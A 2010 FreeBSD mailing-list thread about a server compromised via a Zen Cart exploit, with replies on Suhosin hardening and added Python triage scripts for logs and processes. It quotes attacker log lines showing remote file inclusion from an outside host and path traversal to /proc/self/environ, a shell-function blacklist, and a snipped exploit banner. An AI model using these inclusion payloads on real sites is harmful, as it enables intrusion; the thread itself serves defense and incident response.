Re: Server compromised Zen-Cart record company Exploit

2010-02-04 Thread James Smallacombe


Replying to Bogdan Webb's reply recommending Suhosin:

This appears to be exactly what I needed, thanks!  The stock ports PHP
install already has the Suhosin patch, but the extension is a godsend!
Not only does it log everything, but it lets you manage php functions on
a per virtual host basis, not just in php.ini.  Fantastic and is working
great.  About the only thing I could want more would be to control the
functions under the apache Directory directives (on top of in
VirtualHost).



Re: Server compromised Zen-Cart record company Exploit

2010-02-01 Thread Bogdan Webb
try php's safe_mode but it is likely to keep the hackers off, indeed they
can get in and snatch some data but they would be kept out of a shell's
reach... but sometimes safe_mode is not enough... try considering Suhosin
but the addon not the patch... and define the
suhosin.executor.func.blacklist which will deny use of certain php commands
that allow shell execution... but keep in mind it's impossible to prevent
all breaches... this php patch will only keep the hacker kiddos off but
there's still a good chance it can be broken... stay safe !

ref's:
http://www.hardened-php.net/suhosin.127.html
http://beta.pgn.ro/phps/phpinfo.php


___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org


Re: Server compromised Zen-Cart record company Exploit

2010-02-01 Thread Fbsd1

check out port mod_security for apache31 and mod_security2 for apache22


Re: Server compromised Zen-Cart record company Exploit

2010-02-01 Thread James Smallacombe


(please reply-all; I am not sub'd and sorry for the top posting):

I have safe_mode off due to popular demand.  So many customer apps demand 
that it be kept off.  In fact, here is a post from one of the Zen people 
on the Zen-cart forum.  In light of this exploit, this might be a little 
ironic:


http://www.zen-cart.com/forum/showthread.php?t=76740

There is one for-sure patch: Turn off safe-mode.

Keep in mind that future versions of PHP will *not* even include a 
safe-mode ... because it's a weak bandage giving a false sense of security 
to hosts who don't otherwise know how to properly secure their servers.


This begs the question: why? ie: why would you want to run your online 
business on a server that's got to use safe-mode in order to think they're 
securing the server?


I'm not trying to badmouth your server administrator; rather I'm 
attempting to strongly make the point that unless safe-mode is being used 
for a very specific reason for which there is no other solution (an 
unlikely situation), it shouldn't be used. And, if it is being used, you 
shouldn't run your business there, because there will be other security 
issues to which you'll be vulnerable but never have a clue about it until 
disaster strikes, because the big picture of security protection has been 
poorly implemented.


That said, Zen Cart will install and run even if Safe Mode is active; 
however, you run the risk of certain features not working with or without 
notice, and the unexpected appearance of warning or fatal errors while 
customers are using the site. And then there's the issue of the admin side 
needing to do various things that safe-mode doesn't like.


So, I guess, in short ... you can do it, but you do so at your own risk.

Maybe that's more than you wanted to hear ... sorry



Re: Server compromised Zen-Cart record company Exploit

2010-02-01 Thread Bogdan Webb
Indeed it's pretty tricky with safe_mode, like for certain I know that a
version of a popular r57 shell had safe_mode bypass - I was stunned to check
the shell myself on my server... and I was thinking that safe_mode is
enough... (+ I was using the Suhosin patch *which in fact does nothing
regarding straightening the php) then I came over Suhosin the addon (which
on my BSD with lighttpd it could be loaded only using Zend framework... for
unknown reasons to me) the Suhosin was configured to blacklist some basic
commands that allow php to directly run shell commands:

suhosin.executor.func.blacklist =
proc_nice,shell_exec,show_source,symlink,system,dl,highlight_file,ini_alter,ini_restore,openlog,passthru,exec

thus even if hackers find bugs in some php apps it would be harder to get a
shell... I say harder because it's impossible to prevent that - there are
mysql ways to get shell and so on ... so it's not 100% foolproof, but it's

here's some examples on how suhoshin alerts the attacks:

Jan  2 02:17:00 pgn suhosin[75216]: ALERT - tried to register forbidden variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker '91.121.75.82', file '/usr/home//pgnlinks/index.php')

Dec 16 23:43:36 pgn suhosin[87560]: ALERT - function within blacklist called: shell_exec() (attacker '86.122.161.162', file '/usr/home//pvpwww/junkforum/Sources/Subs.php', line 3531)

*note - these are logs from /var/log/messages and the last message is a
false-positive (I think it's called that way); it's a basic function of the SMF
board to check the DNS with a linux command, but I just wanted to point out
how it handles the blacklist...

here's some more detailed info regarding attacks (attempts) stored in the
webserver's log file (in my case lighttpd):

2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'list' (attacker '189.26.208.35', file '/usr/home//pgnlinks/index.php')
2010-01-19 02:21:54: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'c' (attacker '189.26.208.35', file '/usr/home//pgnlinks/index.php')

189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] GET /index.php?list=http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1 302 0 - Mozilla/3.0 (compatible; Indy Library)
189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] GET /index.php?c=http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1 200 3304 - Mozilla/3.0 (compatible; Indy Library)
189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:53 +0200] GET /index.php?list=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1 200 3307 - Mozilla/3.0 (compatible; Indy Library)
189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:54 +0200] GET /index.php?c=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1 200 3306 - Mozilla/3.0 (compatible; Indy Library)


My server has safe_mode off - because it's not needed (at least in my mind... I
might be mistaken) and check out the phpinfo.php file I've got and see the
Suhosin settings

stay safe!
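Added example, not code from the thread: a small Python triage script for the two log shapes Bogdan posted, the Suhosin ALERT lines (syslog or lighttpd's FastCGI stderr) and the lighttpd access log, tagging blacklisted-function calls, dropped NUL bytes, remote-include URLs and the ../ walk to /proc/self/environ. The sample lines are constructed; hosts, IPs and paths are placeholders.

```python
"""Triage Suhosin ALERT lines and lighttpd access-log entries for the attack shapes posted."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Suhosin uses one message shape in syslog and in lighttpd's FastCGI stderr:
#   ALERT - <reason> (attacker '<ip>', file '<path>'[, line <n>])
SUHOSIN_ALERT = re.compile(
    r"ALERT - (?P<reason>.+?) \(attacker '(?P<ip>[^']+)', file '(?P<file>[^']+)'"
    r"(?:, line (?P<line>\d+))?\)")
# lighttpd access log in common log format: host vhost user [time] "METHOD url proto" status ...
ACCESS_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<url>\S+) [^"]*" \d{3}')
REASON_TAGS = (("function within blacklist called", "blacklisted-function"),
               ("ASCII-NUL chars", "nul-byte"),
               ("tried to register forbidden variable", "superglobal-overwrite"))

def parse_suhosin(line):
    """Return ip/file/line/tag for a Suhosin ALERT line, None for anything else."""
    m = SUHOSIN_ALERT.search(line)
    if not m:
        return None
    tag = next((t for prefix, t in REASON_TAGS if m["reason"].startswith(prefix)), "other")
    return {"ip": m["ip"], "file": m["file"], "line": m["line"], "tag": tag}

def classify_url(url):
    """Tag a request URL with the inclusion tricks the thread's access log shows."""
    tags = set()
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        v = unquote(value)  # second decode pass also catches double-encoded ../ and %00
        if re.match(r"(?i)(https?|ftp)://", v):
            tags.add("rfi")          # parameter points at a remote script
        if "\x00" in v:
            tags.add("nul-byte")     # NUL byte used to cut off an appended suffix
        if "../" in v or "..\\" in v:
            tags.add("traversal")
        if "/proc/self/environ" in v:
            tags.add("lfi-environ")  # the file the thread's attacker went after
    return tags

def triage(syslog_lines, access_lines):
    """Collect findings per source IP; an IP with nothing odd is left out."""
    findings = defaultdict(set)
    for line in syslog_lines:
        hit = parse_suhosin(line)
        if hit:
            findings[hit["ip"]].add(hit["tag"])
    for line in access_lines:
        m = ACCESS_LINE.match(line)
        if m:
            findings[m["ip"]].update(classify_url(m["url"]))
    return {ip: sorted(tags) for ip, tags in findings.items() if tags}

# Constructed sample lines in the shape of the ones posted; IPs, hosts and paths are placeholders.
SYSLOG = [
    "Dec 16 23:43:36 host suhosin[87560]: ALERT - function within blacklist called: shell_exec() "
    "(attacker '192.0.2.20', file '/usr/home/EXAMPLE/forum/Sources/Subs.php', line 3531)",
    "2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed "
    "within request variables - dropped variable 'list' (attacker '192.0.2.30', file '/usr/home/EXAMPLE/index.php')",
]
ACCESS = [
    '192.0.2.30 www.example.test - [19/Jan/2010:02:20:43 +0200] "GET /index.php?list=http://evil.example/cmd.txt? HTTP/1.1" 302 0 "-" "Mozilla/3.0"',
    '192.0.2.30 www.example.test - [19/Jan/2010:02:21:53 +0200] "GET /index.php?list=../../../../proc/self/environ%00 HTTP/1.1" 200 3307 "-" "Mozilla/3.0"',
    '198.51.100.5 www.example.test - [19/Jan/2010:02:30:00 +0200] "GET /index.php?main_page=index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
```

A blacklisted-function hit still needs the manual check Bogdan describes, since a forum's DNS lookup can trip the same `shell_exec()` alert as an intrusion.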


Server compromised Zen-Cart record company Exploit

2010-01-31 Thread James Smallacombe


Whoever speculated that my server may have been compromised was on to
something (see bottom).  The good news is, it does appear to be contained
to the www unprivileged user (with no shell).  The bad news is, they can
still cause a lot of trouble.  I found the compromised customer site and
chmod 0 their cart (had php binaries called core(some number).php that
gave the hacker a nice browser screen to cause all kinds of trouble)


Not sure if this is related to the UDP floods, but if not, it's a heck of 
a coincidence.  At times, CPU went through the roof for the www user, 
mostly running some sort of perl scripts (nothing in the suexec-log).  I 
would kill apache, but couldn't restart it as it would show port 80 in 
use.  I would have to manually kill processes like these:


www  70471  1.4  0.1  6056  3824  ??  R  4:21PM   0:44.75 [eth0] (perl)
www  70470  1.2  0.1  6060  3828  ??  R  4:21PM   0:44.50 [bash] (perl)
www  64779  1.0  0.1  6056  3820  ??  R  4:07PM   2:24.34 /sbin/klogd -c 1 -x -x (perl)
www  70472  1.0  0.1  6060  3828  ??  R  4:21PM   0:44.84

I could not find ANY file named klogd on the system, let alone in /sbin. 
Clues as to how to dig myself out of this are appreciated


I found this in /tmp/bx1.txt:

#!/usr/bin/php
<?php

#
# --- Zen Cart 1.3.8 Remote Code Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
#
# A new version (1.3.8a) is available on http://www.zen-cart.com/
#
# BlackH :)
#

error_reporting(E_ALL ^ E_NOTICE);
if($argc < 2)
{
echo "
=___ Zen Cart 1.3.8 Remote Code Execution Exploit  =
|  BlackH bl4c...@gmail.com  |
|  |
| \$system php $argv[0] url|
| Notes: url  ex: http://victim.com/site (no slash)  |
|  |
";exit(1);

---  snipped --

It is dated from two nights ago, after these issues started, but it's
nonetheless alarming.  Security Focus is aware of the issue and refers you
to Zen for the fix.  Only problem is, this is an old version of Zen cart,
and the


James Smallacombe PlantageNet, Inc. CEO and Janitor
u...@3.am   http://3.am
=
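Added example, not code from the thread: a Python triage of a FreeBSD `ps aux` listing for the tells visible in the post above, where a process owned by www shows a fake name like [eth0] or /sbin/klogd while ps reports the real executable as (perl). It relies on FreeBSD ps printing the real command name in parentheses when argv[0] has been rewritten; the sample listing and the `on_disk` stub are constructed.

```python
"""Flag suspicious entries in FreeBSD `ps aux` output, using the tells from the thread."""
import os
import re

PS_FIELDS = ("user", "pid", "cpu", "mem", "vsz", "rss", "tt", "stat", "started", "time")
# FreeBSD ps appends the real command name in parentheses when a process has
# rewritten its argv[0]; that "(perl)" suffix is what gave the thread's processes away.
REAL_NAME = re.compile(r"^(?P<argv>.*?)\s*\((?P<real>[^()\s]+)\)$")

def parse_ps_line(line):
    """Split one `ps aux` line into fields; None for the header or a truncated line."""
    parts = line.split(None, 10)
    if len(parts) < 11 or not parts[1].isdigit():
        return None
    entry = dict(zip(PS_FIELDS, parts[:10]))
    m = REAL_NAME.match(parts[10].strip())
    entry["argv"] = m["argv"] if m else parts[10].strip()
    entry["real"] = m["real"] if m else None
    return entry

def flags(entry, path_exists=os.path.exists, web_users=("www",)):
    """Reasons this process deserves a look; an empty tuple means nothing odd was seen."""
    reasons = []
    argv0 = entry["argv"].split()[0] if entry["argv"].split() else ""
    shown = os.path.basename(argv0).strip("[]")
    if entry["real"] and shown != entry["real"]:
        reasons.append(f"argv0 says {argv0!r} but the executable is {entry['real']!r}")
    if argv0.startswith("[") and entry["user"] != "root":
        reasons.append("kernel-thread style name owned by a non-root user")
    if argv0.startswith("/") and not path_exists(argv0):
        reasons.append(f"claims to be {argv0} but no such file exists on disk")
    if entry["real"] == "perl" and entry["user"] in web_users:
        reasons.append("perl interpreter running as the web server user")
    return tuple(reasons)

def triage_ps(lines, path_exists=os.path.exists):
    """Map pid -> reasons for every line that raised at least one flag."""
    out = {}
    for line in lines:
        entry = parse_ps_line(line)
        if entry:
            why = flags(entry, path_exists)
            if why:
                out[entry["pid"]] = why
    return out

# Constructed `ps aux` lines modelled on the thread's listing, plus two benign ones.
SAMPLE_PS = [
    "USER   PID %CPU %MEM  VSZ  RSS  TT  STAT STARTED    TIME COMMAND",
    "root     0  0.0  0.0     0    0  ??  DLs  4:00PM  0:00.00 [kernel]",
    "root   512  0.0  0.1  3216 1200  ??  Ss   4:00PM  0:00.10 /usr/sbin/syslogd -s",
    "www  70471  1.4  0.1  6056 3824  ??  R    4:21PM  0:44.75 [eth0] (perl)",
    "www  70470  1.2  0.1  6060 3828  ??  R    4:21PM  0:44.50 [bash] (perl)",
    "www  64779  1.0  0.1  6056 3820  ??  R    4:07PM  2:24.34 /sbin/klogd -c 1 -x -x (perl)",
    "www  70472  1.0  0.1  6060 3828  ??  R    4:21PM  0:44.84",
]

def on_disk(path):
    """Stub for the offline demo: only syslogd 'exists', as klogd did not on the poster's box."""
    return path == "/usr/sbin/syslogd"
```

On a live system call `triage_ps(subprocess.check_output(["ps", "aux"], text=True).splitlines())` and let `os.path.exists` do the disk check.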